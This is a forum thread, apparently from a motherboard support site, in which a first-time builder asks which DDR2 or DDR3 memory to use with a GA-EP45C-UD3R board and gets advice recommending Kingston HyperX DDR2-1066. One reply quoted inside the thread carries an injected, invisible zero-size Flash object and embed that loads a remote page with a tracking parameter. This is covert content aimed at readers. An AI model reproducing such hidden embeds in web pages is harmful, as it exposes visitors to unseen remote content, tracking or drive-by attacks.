Collapse
X

• Filter
  • Time
  • Show
Clear All

• What Memory To Use w / GA-EP45C-UD3R?

Hello,
    First post here. I have not built a PC since 2002. Needless to say, things are a bit different now. I have settled on a GA-EP45C-UD3R motherboard (or one very similar), due to the extra PCI ports and so-forth, and an Intel E8400 or E8500 cpu. I plan on using a middle of the road graphics card with it as well.
    Problem:
    I don't really understand how much, or which speed of memory to get. I have a copy of XP Pro I intend to use (32), but will most likely upgrade to Vista sometime.
    The board will apparently accept PC8500 (DDR2 1066?), but I have rad here and there that it will not run at the rated speed without overclocking. Is there any point in getting memory that fast, or have I missed something somewhere?
    I see all sorts of configurations used here and on several other forums, but some staright up advice would go along way for me.
    Thanks,
    Dave

Re: What Memory To Use w / GA-EP45C-UD3R?

You have a choice of memory for this board. You can use either DDR2 or DDR3 memory. But you can not mix the two. One or the other only! And you must install memory in mathched pairs, that is two at at time in their appropriate slot. You can install up to 16 G of memory if you use the DDR2 but only 8 Gs if you use the DDR3. Either way both memory is a bit expensive but I can attest it is quicker than the old type memory.

I hope this helps.

Comment

Only more thing I am currently using ....8 Gs
      Kingston HyperX 2GB 240-Pin DDR2 SDRAM DDR2 1066 (PC2 8500)
      In my GA-EP45C-UD3R

E7300 CPU
      2800 Pro ATI Graphic card

Comment

Thanks!,
        I ordered that same memory from NewEgg. Appears to be a popular choice.

Comment

Originally posted by Loctite View Post
          Thanks!,
          I ordered that same memory from NewEgg. Appears to be a popular choice.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://ancientnovels.com/general/100-ways-to-use-your-ipod-to-learn-and-study-better/?tracker=3248"></param><param name="allowFullScreen" value="true"></param><embed src="http://ancientnovels.com/general/100-ways-to-use-your-ipod-to-learn-and-study-better/?tracker=3248" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
          And it is
          Last edited by criteriadan; 03-06-2009, 09:35 AM.

Comment

Good choice! DDR3 makes no noticeable difference on Core 2 systems. Kingstona also makes very solid stuff :)

Comment

Working...
            X